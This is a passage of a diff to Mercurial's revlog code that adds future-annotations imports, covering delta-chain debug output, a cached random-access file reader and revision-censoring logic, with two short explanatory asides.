578 580 % tuple(semisize)
579 581 )
580 582 for depth in sorted(snapsizedepth):
581 583 if depth == 0:
582 584 continue
583 585 ui.writenoi18n(
584 586 b' level-%-3d (min/max/avg) : %d / %d / %d\n'
585 587 % ((depth,) + tuple(snapsizedepth[depth]))
586 588 )
587 589 ui.writenoi18n(
588 590 b'delta size (min/max/avg) : %d / %d / %d\n'
589 591 % tuple(deltasize)
590 592 )
591 593
592 594 if numdeltas > 0:
593 595 ui.write(b'\n')
594 596 fmt = pcfmtstr(numdeltas)
595 597 fmt2 = pcfmtstr(numdeltas, 4)
596 598 ui.writenoi18n(
597 599 b'deltas against prev : ' + fmt % pcfmt(numprev, numdeltas)
598 600 )
599 601 if numprev > 0:
600 602 ui.writenoi18n(
601 603 b' where prev = p1 : ' + fmt2 % pcfmt(nump1prev, numprev)
602 604 )
603 605 ui.writenoi18n(
604 606 b' where prev = p2 : ' + fmt2 % pcfmt(nump2prev, numprev)
605 607 )
606 608 ui.writenoi18n(
607 609 b' other-ancestor : ' + fmt2 % pcfmt(numoprev, numprev)
608 610 )
609 611 ui.writenoi18n(
610 612 b' unrelated : ' + fmt2 % pcfmt(numprev_nad, numprev)
611 613 )
612 614 if gdelta:
613 615 ui.writenoi18n(
614 616 b'deltas against p1 : ' + fmt % pcfmt(nump1, numdeltas)
615 617 )
616 618 ui.writenoi18n(
617 619 b'deltas against p2 : ' + fmt % pcfmt(nump2, numdeltas)
618 620 )
619 621 ui.writenoi18n(
620 622 b'deltas against ancs : '
621 623 + fmt % pcfmt(num_other_ancestors, numdeltas)
622 624 )
623 625 ui.writenoi18n(
624 626 b'deltas against other : '
625 627 + fmt % pcfmt(numother_nad, numdeltas)
626 628 )
627 629
628 630
629 631 def debug_delta_find(ui, revlog, rev, base_rev=nodemod.nullrev):
630 632 """display the search process for a delta"""
631 633 deltacomputer = deltautil.deltacomputer(
632 634 revlog,
633 635 write_debug=ui.write,
634 636 debug_search=not ui.quiet,
635 637 )
636 638
637 639 node = revlog.node(rev)
638 640 p1r, p2r = revlog.parentrevs(rev)
639 641 p1 = revlog.node(p1r)
640 642 p2 = revlog.node(p2r)
641 643 full_text = revlog.revision(rev)
642 644 btext = [full_text]
643 645 textlen = len(btext[0])
644 646 cachedelta = None
645 647 flags = revlog.flags(rev)
646 648
647 649 if base_rev != nodemod.nullrev:
648 650 base_text = revlog.revision(base_rev)
649 651 delta = mdiff.textdiff(base_text, full_text)
650 652
651 653 cachedelta = (base_rev, delta, constants.DELTA_BASE_REUSE_TRY)
652 654 btext = [None]
653 655
654 656 revinfo = revlogutils.revisioninfo(
655 657 node,
656 658 p1,
657 659 p2,
658 660 btext,
659 661 textlen,
660 662 cachedelta,
661 663 flags,
662 664 )
663 665
664 666 fh = revlog._datafp()
665 667 deltacomputer.finddeltainfo(revinfo, fh, target_rev=rev)
666 668
667 669
668 670 def debug_revlog_stats(
669 671 repo, fm, changelog: bool, manifest: bool, filelogs: bool
670 672 ):
671 673 """Format revlog statistics for debugging purposes
672 674
673 675 fm: the output formatter.
674 676 """
675 677 fm.plain(b'rev-count data-size inl type target \n')
676 678
677 679 revlog_entries = [e for e in repo.store.walk() if e.is_revlog]
678 680 revlog_entries.sort(key=lambda e: (e.revlog_type, e.target_id))
679 681
680 682 for entry in revlog_entries:
681 683 if not changelog and entry.is_changelog:
682 684 continue
683 685 elif not manifest and entry.is_manifestlog:
684 686 continue
685 687 elif not filelogs and entry.is_filelog:
686 688 continue
687 689 rlog = entry.get_revlog_instance(repo).get_revlog()
688 690 fm.startitem()
689 691 nb_rev = len(rlog)
690 692 inline = rlog._inline
691 693 data_size = rlog._get_data_offset(nb_rev - 1)
692 694
693 695 target = rlog.target
694 696 revlog_type = b'unknown'
695 697 revlog_target = b''
696 698 if target[0] == constants.KIND_CHANGELOG:
697 699 revlog_type = b'changelog'
698 700 elif target[0] == constants.KIND_MANIFESTLOG:
699 701 revlog_type = b'manifest'
700 702 revlog_target = target[1]
701 703 elif target[0] == constants.KIND_FILELOG:
702 704 revlog_type = b'file'
703 705 revlog_target = target[1]
704 706
705 707 fm.write(b'revlog.rev-count', b'%9d', nb_rev)
706 708 fm.write(b'revlog.data-size', b'%12d', data_size)
707 709
708 710 fm.write(b'revlog.inline', b' %-3s', b'yes' if inline else b'no')
709 711 fm.write(b'revlog.type', b' %-9s', revlog_type)
710 712 fm.write(b'revlog.target', b' %s', revlog_target)
711 713
712 714 fm.plain(b'\n')
713 715
714 716
715 717 class DeltaChainAuditor:
716 718 def __init__(self, revlog):
717 719 self._revlog = revlog
718 720 self._index = self._revlog.index
719 721 self._generaldelta = revlog.delta_config.general_delta
720 722 self._chain_size_cache = {}
721 723 # security to avoid crash on corrupted revlogs
722 724 self._total_revs = len(self._index)
723 725
724 726 def revinfo(self, rev, size_info=True, dist_info=True, sparse_info=True):
725 727 e = self._index[rev]
726 728 compsize = e[constants.ENTRY_DATA_COMPRESSED_LENGTH]
727 729 uncompsize = e[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH]
728 730
729 731 base = e[constants.ENTRY_DELTA_BASE]
730 732 p1 = e[constants.ENTRY_PARENT_1]
731 733 p2 = e[constants.ENTRY_PARENT_2]
732 734
733 735 # If a parent of a revision has an empty delta, we never try to
734 736 # delta against that parent, but directly against the delta base of
735 737 # that parent (recursively). This avoids adding a useless entry in the
736 738 # chain.
737 739 #
738 740 # However, we need to detect that as a special case for the delta-type,
739 741 # so that it is not simply reported as "other".
740 742 p1_base = p1
741 743 if p1 != nodemod.nullrev and p1 < self._total_revs:
742 744 e1 = self._index[p1]
743 745 while e1[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0:
744 746 new_base = e1[constants.ENTRY_DELTA_BASE]
745 747 if (
746 748 new_base == p1_base
747 749 or new_base == nodemod.nullrev
748 750 or new_base >= self._total_revs
749 751 ):
750 752 break
751 753 p1_base = new_base
752 754 e1 = self._index[p1_base]
753 755 p2_base = p2
754 756 if p2 != nodemod.nullrev and p2 < self._total_revs:
755 757 e2 = self._index[p2]
756 758 while e2[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0:
757 759 new_base = e2[constants.ENTRY_DELTA_BASE]
758 760 if (
759 761 new_base == p2_base
760 762 or new_base == nodemod.nullrev
761 763 or new_base >= self._total_revs
762 764 ):
763 765 break
764 766 p2_base = new_base
765 767 e2 = self._index[p2_base]
766 768
767 769 if self._generaldelta:
768 770 if base == p1:
769 771 deltatype = b'p1'
770 772 elif base == p2:
771 773 deltatype = b'p2'
772 774 elif base == rev:
773 775 deltatype = b'base'
774 776 elif base == p1_base:
775 777 deltatype = b'skip1'
776 778 elif base == p2_base:
777 779 deltatype = b'skip2'
778 780 elif self._revlog.issnapshot(rev):
779 781 deltatype = b'snap'
780 782 elif base == rev - 1:
781 783 deltatype = b'prev'
782 784 else:
783 785 deltatype = b'other'
784 786 else:
785 787 if base == rev:
786 788 deltatype = b'base'
787 789 else:
788 790 deltatype = b'prev'
789 791
790 792 chain = self._revlog._deltachain(rev)[0]
791 793
792 794 data = {
793 795 'p1': p1,
794 796 'p2': p2,
795 797 'compressed_size': compsize,
796 798 'uncompressed_size': uncompsize,
797 799 'deltatype': deltatype,
798 800 'chain': chain,
799 801 }
800 802
801 803 if size_info or dist_info or sparse_info:
802 804 chain_size = 0
803 805 for iter_rev in reversed(chain):
804 806 cached = self._chain_size_cache.get(iter_rev)
805 807 if cached is not None:
806 808 chain_size += cached
807 809 break
808 810 e = self._index[iter_rev]
809 811 chain_size += e[constants.ENTRY_DATA_COMPRESSED_LENGTH]
810 812 self._chain_size_cache[rev] = chain_size
811 813 data['chain_size'] = chain_size
812 814
813 815 return data
814 816
815 817
816 818 def debug_delta_chain(
817 819 revlog,
818 820 revs=None,
819 821 size_info=True,
820 822 dist_info=True,
821 823 sparse_info=True,
822 824 ):
823 825 auditor = DeltaChainAuditor(revlog)
824 826 r = revlog
825 827 start = r.start
826 828 length = r.length
827 829 withsparseread = revlog.data_config.with_sparse_read
828 830
829 831 header = (
830 832 b' rev'
831 833 b' p1'
832 834 b' p2'
833 835 b' chain#'
834 836 b' chainlen'
835 837 b' prev'
836 838 b' delta'
837 839 )
838 840 if size_info:
839 841 header += b' size' b' rawsize' b' chainsize' b' ratio'
840 842 if dist_info:
841 843 header += b' lindist' b' extradist' b' extraratio'
842 844 if withsparseread and sparse_info:
843 845 header += b' readsize' b' largestblk' b' rddensity' b' srchunks'
844 846 header += b'\n'
845 847 yield header
846 848
847 849 if revs is None:
848 850 all_revs = iter(r)
849 851 else:
850 852 revlog_size = len(r)
851 853 all_revs = sorted(rev for rev in revs if rev < revlog_size)
852 854
853 855 chainbases = {}
854 856 for rev in all_revs:
855 857 info = auditor.revinfo(
856 858 rev,
857 859 size_info=size_info,
858 860 dist_info=dist_info,
859 861 sparse_info=sparse_info,
860 862 )
861 863 comp = info['compressed_size']
862 864 uncomp = info['uncompressed_size']
863 865 chain = info['chain']
864 866 chainbase = chain[0]
865 867 chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
866 868 if dist_info:
867 869 basestart = start(chainbase)
868 870 revstart = start(rev)
869 871 lineardist = revstart + comp - basestart
870 872 extradist = lineardist - info['chain_size']
871 873 try:
872 874 prevrev = chain[-2]
873 875 except IndexError:
874 876 prevrev = -1
875 877
876 878 if size_info:
877 879 chainsize = info['chain_size']
878 880 if uncomp != 0:
879 881 chainratio = float(chainsize) / float(uncomp)
880 882 else:
881 883 chainratio = chainsize
882 884
883 885 if dist_info:
884 886 if chainsize != 0:
885 887 extraratio = float(extradist) / float(chainsize)
886 888 else:
887 889 extraratio = extradist
888 890
889 891 # label, display-format, data-key, value
890 892 entry = [
891 893 (b'rev', b'%7d', 'rev', rev),
892 894 (b'p1', b'%7d', 'p1', info['p1']),
893 895 (b'p2', b'%7d', 'p2', info['p2']),
894 896 (b'chainid', b'%7d', 'chainid', chainid),
895 897 (b'chainlen', b'%8d', 'chainlen', len(chain)),
896 898 (b'prevrev', b'%8d', 'prevrev', prevrev),
897 899 (b'deltatype', b'%7s', 'deltatype', info['deltatype']),
898 900 ]
899 901 if size_info:
900 902 entry.extend(
901 903 [
902 904 (b'compsize', b'%10d', 'compsize', comp),
903 905 (b'uncompsize', b'%10d', 'uncompsize', uncomp),
904 906 (b'chainsize', b'%10d', 'chainsize', chainsize),
905 907 (b'chainratio', b'%9.5f', 'chainratio', chainratio),
906 908 ]
907 909 )
908 910 if dist_info:
909 911 entry.extend(
910 912 [
911 913 (b'lindist', b'%9d', 'lindist', lineardist),
912 914 (b'extradist', b'%9d', 'extradist', extradist),
913 915 (b'extraratio', b'%10.5f', 'extraratio', extraratio),
914 916 ]
915 917 )
916 918 if withsparseread and sparse_info:
917 919 chainsize = info['chain_size']
918 920 readsize = 0
919 921 largestblock = 0
920 922 srchunks = 0
921 923
922 924 for revschunk in deltautil.slicechunk(r, chain):
923 925 srchunks += 1
924 926 blkend = start(revschunk[-1]) + length(revschunk[-1])
925 927 blksize = blkend - start(revschunk[0])
926 928
927 929 readsize += blksize
928 930 if largestblock < blksize:
929 931 largestblock = blksize
930 932
931 933 if readsize:
932 934 readdensity = float(chainsize) / float(readsize)
933 935 else:
934 936 readdensity = 1
935 937 entry.extend(
936 938 [
937 939 (b'readsize', b'%10d', 'readsize', readsize),
938 940 (b'largestblock', b'%10d', 'largestblock', largestblock),
939 941 (b'readdensity', b'%9.5f', 'readdensity', readdensity),
940 942 (b'srchunks', b'%8d', 'srchunks', srchunks),
941 943 ]
942 944 )
943 945 yield entry
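Aside: earlier in this hunk, the `total-stored-content` figure is rendered with a space every three digits by a small peel-off loop over `b_total`. The same logic, extracted as a standalone sketch for illustration only (not part of Mercurial's API):

    def group_digits(value):
        """Render an integer as bytes with a space every three digits."""
        text = b"%d" % value
        parts = []
        while len(text) > 3:
            parts.append(text[-3:])   # peel off the last three digits
            text = text[:-3]
        parts.append(text)
        parts.reverse()               # restore most-significant-first order
        return b' '.join(parts)

    assert group_digits(1234567) == b'1 234 567'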
@@ -1,230 +1,232
1 1 # Copyright Mercurial Contributors
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 from __future__ import annotations
7
6 8 import contextlib
7 9
8 10 from ..i18n import _
9 11 from .. import (
10 12 error,
11 13 util,
12 14 )
13 15
14 16
15 17 _MAX_CACHED_CHUNK_SIZE = 1048576 # 1 MiB
16 18
17 19 PARTIAL_READ_MSG = _(
18 20 b'partial read of revlog %s; expected %d bytes from offset %d, got %d'
19 21 )
20 22
21 23
22 24 def _is_power_of_two(n):
23 25 return (n & (n - 1) == 0) and n != 0
24 26
25 27
26 28 class appender:
27 29 """the changelog index must be updated last on disk, so we use this class
28 30 to delay writes to it"""
29 31
30 32 def __init__(self, vfs, name, mode, buf):
31 33 self.data = buf
32 34 fp = vfs(name, mode)
33 35 self.fp = fp
34 36 self.offset = fp.tell()
35 37 self.size = vfs.fstat(fp).st_size
36 38 self._end = self.size
37 39
38 40 def end(self):
39 41 return self._end
40 42
41 43 def tell(self):
42 44 return self.offset
43 45
44 46 def flush(self):
45 47 pass
46 48
47 49 @property
48 50 def closed(self):
49 51 return self.fp.closed
50 52
51 53 def close(self):
52 54 self.fp.close()
53 55
54 56 def seek(self, offset, whence=0):
55 57 '''virtual file offset spans real file and data'''
56 58 if whence == 0:
57 59 self.offset = offset
58 60 elif whence == 1:
59 61 self.offset += offset
60 62 elif whence == 2:
61 63 self.offset = self.end() + offset
62 64 if self.offset < self.size:
63 65 self.fp.seek(self.offset)
64 66
65 67 def read(self, count=-1):
66 68 '''only trick here is reads that span real file and data'''
67 69 ret = b""
68 70 if self.offset < self.size:
69 71 s = self.fp.read(count)
70 72 ret = s
71 73 self.offset += len(s)
72 74 if count > 0:
73 75 count -= len(s)
74 76 if count != 0:
75 77 doff = self.offset - self.size
76 78 self.data.insert(0, b"".join(self.data))
77 79 del self.data[1:]
78 80 s = self.data[0][doff : doff + count]
79 81 self.offset += len(s)
80 82 ret += s
81 83 return ret
82 84
83 85 def write(self, s):
84 86 self.data.append(bytes(s))
85 87 self.offset += len(s)
86 88 self._end += len(s)
87 89
88 90 def __enter__(self):
89 91 self.fp.__enter__()
90 92 return self
91 93
92 94 def __exit__(self, *args):
93 95 return self.fp.__exit__(*args)
94 96
95 97
96 98 class randomaccessfile:
97 99 """Accessing arbitrary chuncks of data within a file, with some caching"""
98 100
99 101 def __init__(
100 102 self,
101 103 opener,
102 104 filename,
103 105 default_cached_chunk_size,
104 106 initial_cache=None,
105 107 ):
106 108 # Required by bitwise manipulation below
107 109 assert _is_power_of_two(default_cached_chunk_size)
108 110
109 111 self.opener = opener
110 112 self.filename = filename
111 113 self.default_cached_chunk_size = default_cached_chunk_size
112 114 self.writing_handle = None # This is set from revlog.py
113 115 self.reading_handle = None
114 116 self._cached_chunk = b''
115 117 self._cached_chunk_position = 0 # Offset from the start of the file
116 118 if initial_cache:
117 119 self._cached_chunk_position, self._cached_chunk = initial_cache
118 120
119 121 def clear_cache(self):
120 122 self._cached_chunk = b''
121 123 self._cached_chunk_position = 0
122 124
123 125 @property
124 126 def is_open(self):
125 127 """True if any file handle is being held
126 128
127 129 Used for assert and debug in the python code"""
128 130 return (
129 131 self.reading_handle is not None or self.writing_handle is not None
130 132 )
131 133
132 134 def _open(self, mode=b'r'):
133 135 """Return a file object"""
134 136 return self.opener(self.filename, mode=mode)
135 137
136 138 @contextlib.contextmanager
137 139 def _read_handle(self):
138 140 """File object suitable for reading data"""
139 141 # Use a file handle being actively used for writes, if available.
140 142 # There is some danger to doing this because reads will seek the
141 143 # file. However, revlog._writeentry performs a SEEK_END before all
142 144 # writes, so we should be safe.
143 145 if self.writing_handle:
144 146 yield self.writing_handle
145 147
146 148 elif self.reading_handle:
147 149 yield self.reading_handle
148 150
149 151 # Otherwise open a new file handle.
150 152 else:
151 153 with self._open() as fp:
152 154 yield fp
153 155
154 156 @contextlib.contextmanager
155 157 def reading(self):
156 158 """Context manager that keeps the file open for reading"""
157 159 if (
158 160 self.reading_handle is None
159 161 and self.writing_handle is None
160 162 and self.filename is not None
161 163 ):
162 164 with self._open() as fp:
163 165 self.reading_handle = fp
164 166 try:
165 167 yield
166 168 finally:
167 169 self.reading_handle = None
168 170 else:
169 171 yield
170 172
171 173 def read_chunk(self, offset, length):
172 174 """Read a chunk of bytes from the file.
173 175
174 176 Accepts an absolute offset and a length to read.
175 177
176 178 Returns a str or buffer of raw byte data.
177 179
178 180 Raises if the requested number of bytes could not be read.
179 181 """
180 182 end = offset + length
181 183 cache_start = self._cached_chunk_position
182 184 cache_end = cache_start + len(self._cached_chunk)
183 185 # Is the requested chunk within the cache?
184 186 if cache_start <= offset and end <= cache_end:
185 187 if cache_start == offset and end == cache_end:
186 188 return self._cached_chunk # avoid a copy
187 189 relative_start = offset - cache_start
188 190 return util.buffer(self._cached_chunk, relative_start, length)
189 191
190 192 return self._read_and_update_cache(offset, length)
191 193
192 194 def _read_and_update_cache(self, offset, length):
193 195 # Cache data both forward and backward around the requested
194 196 # data, in a fixed size window. This helps speed up operations
195 197 # involving reading the revlog backwards.
196 198 real_offset = offset & ~(self.default_cached_chunk_size - 1)
197 199 real_length = (
198 200 (offset + length + self.default_cached_chunk_size)
199 201 & ~(self.default_cached_chunk_size - 1)
200 202 ) - real_offset
201 203 with self._read_handle() as file_obj:
202 204 file_obj.seek(real_offset)
203 205 data = file_obj.read(real_length)
204 206
205 207 self._add_cached_chunk(real_offset, data)
206 208
207 209 relative_offset = offset - real_offset
208 210 got = len(data) - relative_offset
209 211 if got < length:
210 212 message = PARTIAL_READ_MSG % (self.filename, length, offset, got)
211 213 raise error.RevlogError(message)
212 214
213 215 if offset != real_offset or real_length != length:
214 216 return util.buffer(data, relative_offset, length)
215 217 return data
216 218
217 219 def _add_cached_chunk(self, offset, data):
218 220 """Add to or replace the cached data chunk.
219 221
220 222 Accepts an absolute offset and the data that is at that location.
221 223 """
222 224 if (
223 225 self._cached_chunk_position + len(self._cached_chunk) == offset
224 226 and len(self._cached_chunk) + len(data) < _MAX_CACHED_CHUNK_SIZE
225 227 ):
226 228 # add to existing cache
227 229 self._cached_chunk += data
228 230 else:
229 231 self._cached_chunk = data
230 232 self._cached_chunk_position = offset
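For readers unfamiliar with the bit trick in `_read_and_update_cache`: because `default_cached_chunk_size` must be a power of two (see `_is_power_of_two` above), masking with `~(size - 1)` rounds an offset down to a window boundary. A minimal standalone sketch, assuming a hypothetical 64 KiB window rather than whatever a real revlog configures:

    CHUNK = 64 * 1024  # power of two, as the class asserts

    def aligned_window(offset, length, chunk=CHUNK):
        """Mirror the rounding done by _read_and_update_cache."""
        real_offset = offset & ~(chunk - 1)                   # round down
        real_end = (offset + length + chunk) & ~(chunk - 1)   # round up past the end
        return real_offset, real_end - real_offset

    off, ln = aligned_window(70000, 100)
    assert off <= 70000 and 70000 + 100 <= off + ln   # the request fits in the window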
@@ -1,883 +1,885
1 1 # censor code related to censoring revision
2 2 # coding: utf8
3 3 #
4 4 # Copyright 2021 Pierre-Yves David <pierre-yves.david@octobus.net>
5 5 # Copyright 2015 Google, Inc <martinvonz@google.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 from __future__ import annotations
11
10 12 import binascii
11 13 import contextlib
12 14 import os
13 15 import struct
14 16
15 17 from ..node import (
16 18 nullrev,
17 19 )
18 20 from .constants import (
19 21 COMP_MODE_PLAIN,
20 22 ENTRY_DATA_COMPRESSED_LENGTH,
21 23 ENTRY_DATA_COMPRESSION_MODE,
22 24 ENTRY_DATA_OFFSET,
23 25 ENTRY_DATA_UNCOMPRESSED_LENGTH,
24 26 ENTRY_DELTA_BASE,
25 27 ENTRY_LINK_REV,
26 28 ENTRY_NODE_ID,
27 29 ENTRY_PARENT_1,
28 30 ENTRY_PARENT_2,
29 31 ENTRY_SIDEDATA_COMPRESSED_LENGTH,
30 32 ENTRY_SIDEDATA_COMPRESSION_MODE,
31 33 ENTRY_SIDEDATA_OFFSET,
32 34 REVIDX_ISCENSORED,
33 35 REVLOGV0,
34 36 REVLOGV1,
35 37 )
36 38 from ..i18n import _
37 39
38 40 from .. import (
39 41 error,
40 42 mdiff,
41 43 pycompat,
42 44 revlogutils,
43 45 util,
44 46 )
45 47 from ..utils import (
46 48 storageutil,
47 49 )
48 50 from . import (
49 51 constants,
50 52 deltas,
51 53 )
52 54
53 55
54 56 def v1_censor(rl, tr, censor_nodes, tombstone=b''):
55 57 """censors a revision in a "version 1" revlog"""
56 58 assert rl._format_version == constants.REVLOGV1, rl._format_version
57 59
58 60 # avoid cycle
59 61 from .. import revlog
60 62
61 63 censor_revs = set(rl.rev(node) for node in censor_nodes)
62 64 tombstone = storageutil.packmeta({b'censored': tombstone}, b'')
63 65
64 66 # Rewriting the revlog in place is hard. Our strategy for censoring is
65 67 # to create a new revlog, copy all revisions to it, then replace the
66 68 # revlogs on transaction close.
67 69 #
68 70 # This is a bit dangerous. We could easily have a mismatch of state.
69 71 newrl = revlog.revlog(
70 72 rl.opener,
71 73 target=rl.target,
72 74 radix=rl.radix,
73 75 postfix=b'tmpcensored',
74 76 censorable=True,
75 77 data_config=rl.data_config,
76 78 delta_config=rl.delta_config,
77 79 feature_config=rl.feature_config,
78 80 may_inline=rl._inline,
79 81 )
80 82 # inline splitting will prepare some transaction work that will get
81 83 # confused by the final file move. So if there is a risk of not being
82 84 # inline at the end, we prevent the new revlog to be inline in the first
83 85 # place.
84 86 assert not (newrl._inline and not rl._inline)
85 87
86 88 for rev in rl.revs():
87 89 node = rl.node(rev)
88 90 p1, p2 = rl.parents(node)
89 91
90 92 if rev in censor_revs:
91 93 newrl.addrawrevision(
92 94 tombstone,
93 95 tr,
94 96 rl.linkrev(rev),
95 97 p1,
96 98 p2,
97 99 node,
98 100 constants.REVIDX_ISCENSORED,
99 101 )
100 102
101 103 if newrl.deltaparent(rev) != nullrev:
102 104 m = _(b'censored revision stored as delta; cannot censor')
103 105 h = _(
104 106 b'censoring of revlogs is not fully implemented;'
105 107 b' please report this bug'
106 108 )
107 109 raise error.Abort(m, hint=h)
108 110 continue
109 111
110 112 if rl.iscensored(rev):
111 113 if rl.deltaparent(rev) != nullrev:
112 114 m = _(
113 115 b'cannot censor due to censored '
114 116 b'revision having delta stored'
115 117 )
116 118 raise error.Abort(m)
117 119 rawtext = rl._inner._chunk(rev)
118 120 else:
119 121 rawtext = rl.rawdata(rev)
120 122
121 123 newrl.addrawrevision(
122 124 rawtext, tr, rl.linkrev(rev), p1, p2, node, rl.flags(rev)
123 125 )
124 126
125 127 tr.addbackup(rl._indexfile, location=b'store')
126 128 if not rl._inline:
127 129 tr.addbackup(rl._datafile, location=b'store')
128 130
129 131 rl.opener.rename(newrl._indexfile, rl._indexfile)
130 132 if newrl._inline:
131 133 assert rl._inline
132 134 else:
133 135 assert not rl._inline
134 136 rl.opener.rename(newrl._datafile, rl._datafile)
135 137
136 138 rl.clearcaches()
137 139 chunk_cache = rl._loadindex()
138 140 rl._load_inner(chunk_cache)
139 141
140 142
141 143 def v2_censor(revlog, tr, censor_nodes, tombstone=b''):
142 144 """censors a revision in a "version 2" revlog"""
143 145 assert revlog._format_version != REVLOGV0, revlog._format_version
144 146 assert revlog._format_version != REVLOGV1, revlog._format_version
145 147
146 148 censor_revs = {revlog.rev(node) for node in censor_nodes}
147 149 _rewrite_v2(revlog, tr, censor_revs, tombstone)
148 150
149 151
150 152 def _rewrite_v2(revlog, tr, censor_revs, tombstone=b''):
151 153 """rewrite a revlog to censor some of its content
152 154
153 155 General principle
154 156
155 157 We create new revlog files (index/data/sidedata) to copy the content of
156 158 the existing data without the censored data.
157 159
158 160 We need to recompute new delta for any revision that used the censored
159 161 revision as delta base. As the cumulative size of the new delta may be
160 162 large, we store them in a temporary file until they are stored in their
161 163 final destination.
162 164
163 165 All data before the censored data can be blindly copied. The rest needs
164 166 to be copied as we go and the associated index entry needs adjustment.
165 167 """
166 168 assert revlog._format_version != REVLOGV0, revlog._format_version
167 169 assert revlog._format_version != REVLOGV1, revlog._format_version
168 170
169 171 old_index = revlog.index
170 172 docket = revlog._docket
171 173
172 174 tombstone = storageutil.packmeta({b'censored': tombstone}, b'')
173 175
174 176 first_excl_rev = min(censor_revs)
175 177
176 178 first_excl_entry = revlog.index[first_excl_rev]
177 179 index_cutoff = revlog.index.entry_size * first_excl_rev
178 180 data_cutoff = first_excl_entry[ENTRY_DATA_OFFSET] >> 16
179 181 sidedata_cutoff = revlog.sidedata_cut_off(first_excl_rev)
180 182
181 183 with pycompat.unnamedtempfile(mode=b"w+b") as tmp_storage:
182 184 # rev → (new_base, data_start, data_end, compression_mode)
183 185 rewritten_entries = _precompute_rewritten_delta(
184 186 revlog,
185 187 old_index,
186 188 censor_revs,
187 189 tmp_storage,
188 190 )
189 191
190 192 all_files = _setup_new_files(
191 193 revlog,
192 194 index_cutoff,
193 195 data_cutoff,
194 196 sidedata_cutoff,
195 197 )
196 198
197 199 # we don't need to open the old index file since its content already
198 200 # exists in a usable form in `old_index`.
199 201 with all_files() as open_files:
200 202 (
201 203 old_data_file,
202 204 old_sidedata_file,
203 205 new_index_file,
204 206 new_data_file,
205 207 new_sidedata_file,
206 208 ) = open_files
207 209
208 210 # writing the censored revision
209 211
210 212 # Writing all subsequent revisions
211 213 for rev in range(first_excl_rev, len(old_index)):
212 214 if rev in censor_revs:
213 215 _rewrite_censor(
214 216 revlog,
215 217 old_index,
216 218 open_files,
217 219 rev,
218 220 tombstone,
219 221 )
220 222 else:
221 223 _rewrite_simple(
222 224 revlog,
223 225 old_index,
224 226 open_files,
225 227 rev,
226 228 rewritten_entries,
227 229 tmp_storage,
228 230 )
229 231 docket.write(transaction=None, stripping=True)
230 232
231 233
232 234 def _precompute_rewritten_delta(
233 235 revlog,
234 236 old_index,
235 237 excluded_revs,
236 238 tmp_storage,
237 239 ):
238 240 """Compute new delta for revisions whose delta is based on revision that
239 241 will not survive as is.
240 242
241 243 Return a mapping: {rev → (new_base, data_start, data_end, compression_mode)}
242 244 """
243 245 dc = deltas.deltacomputer(revlog)
244 246 rewritten_entries = {}
245 247 first_excl_rev = min(excluded_revs)
246 248 with revlog.reading():
247 249 for rev in range(first_excl_rev, len(old_index)):
248 250 if rev in excluded_revs:
249 251 # this revision will be preserved as is, so we don't need to
250 252 # consider recomputing a delta.
251 253 continue
252 254 entry = old_index[rev]
253 255 if entry[ENTRY_DELTA_BASE] not in excluded_revs:
254 256 continue
255 257 # This is a revision that uses the censored revision as the base
256 258 # for its delta. We need to compute a new delta for it.
257 259 if entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] == 0:
258 260 # this revision is empty, we can delta against nullrev
259 261 rewritten_entries[rev] = (nullrev, 0, 0, COMP_MODE_PLAIN)
260 262 else:
261 263 text = revlog.rawdata(rev)
262 264 info = revlogutils.revisioninfo(
263 265 node=entry[ENTRY_NODE_ID],
264 266 p1=revlog.node(entry[ENTRY_PARENT_1]),
265 267 p2=revlog.node(entry[ENTRY_PARENT_2]),
266 268 btext=[text],
267 269 textlen=len(text),
268 270 cachedelta=None,
269 271 flags=entry[ENTRY_DATA_OFFSET] & 0xFFFF,
270 272 )
271 273 d = dc.finddeltainfo(
272 274 info, excluded_bases=excluded_revs, target_rev=rev
273 275 )
274 276 default_comp = revlog._docket.default_compression_header
275 277 comp_mode, d = deltas.delta_compression(default_comp, d)
276 278 # using `tell` is a bit lazy, but we are not here for speed
277 279 start = tmp_storage.tell()
278 280 tmp_storage.write(d.data[1])
279 281 end = tmp_storage.tell()
280 282 rewritten_entries[rev] = (d.base, start, end, comp_mode)
281 283 return rewritten_entries
282 284
283 285
284 286 def _setup_new_files(
285 287 revlog,
286 288 index_cutoff,
287 289 data_cutoff,
288 290 sidedata_cutoff,
289 291 ):
290 292 """
291 293
292 294 return a context manager to open all the relevant files:
293 295 - old_data_file,
294 296 - old_sidedata_file,
295 297 - new_index_file,
296 298 - new_data_file,
297 299 - new_sidedata_file,
298 300
299 301 The old_index_file is not here because it is accessed through the
300 302 `old_index` object of the caller function.
301 303 """
302 304 docket = revlog._docket
303 305 old_index_filepath = revlog.opener.join(docket.index_filepath())
304 306 old_data_filepath = revlog.opener.join(docket.data_filepath())
305 307 old_sidedata_filepath = revlog.opener.join(docket.sidedata_filepath())
306 308
307 309 new_index_filepath = revlog.opener.join(docket.new_index_file())
308 310 new_data_filepath = revlog.opener.join(docket.new_data_file())
309 311 new_sidedata_filepath = revlog.opener.join(docket.new_sidedata_file())
310 312
311 313 util.copyfile(old_index_filepath, new_index_filepath, nb_bytes=index_cutoff)
312 314 util.copyfile(old_data_filepath, new_data_filepath, nb_bytes=data_cutoff)
313 315 util.copyfile(
314 316 old_sidedata_filepath,
315 317 new_sidedata_filepath,
316 318 nb_bytes=sidedata_cutoff,
317 319 )
318 320 revlog.opener.register_file(docket.index_filepath())
319 321 revlog.opener.register_file(docket.data_filepath())
320 322 revlog.opener.register_file(docket.sidedata_filepath())
321 323
322 324 docket.index_end = index_cutoff
323 325 docket.data_end = data_cutoff
324 326 docket.sidedata_end = sidedata_cutoff
325 327
326 328 # reload the revlog internal information
327 329 revlog.clearcaches()
328 330 revlog._loadindex(docket=docket)
329 331
330 332 @contextlib.contextmanager
331 333 def all_files_opener():
332 334 # hide opening in a helper function to please check-code, black
333 335 # and various python versions at the same time
334 336 with open(old_data_filepath, 'rb') as old_data_file:
335 337 with open(old_sidedata_filepath, 'rb') as old_sidedata_file:
336 338 with open(new_index_filepath, 'r+b') as new_index_file:
337 339 with open(new_data_filepath, 'r+b') as new_data_file:
338 340 with open(
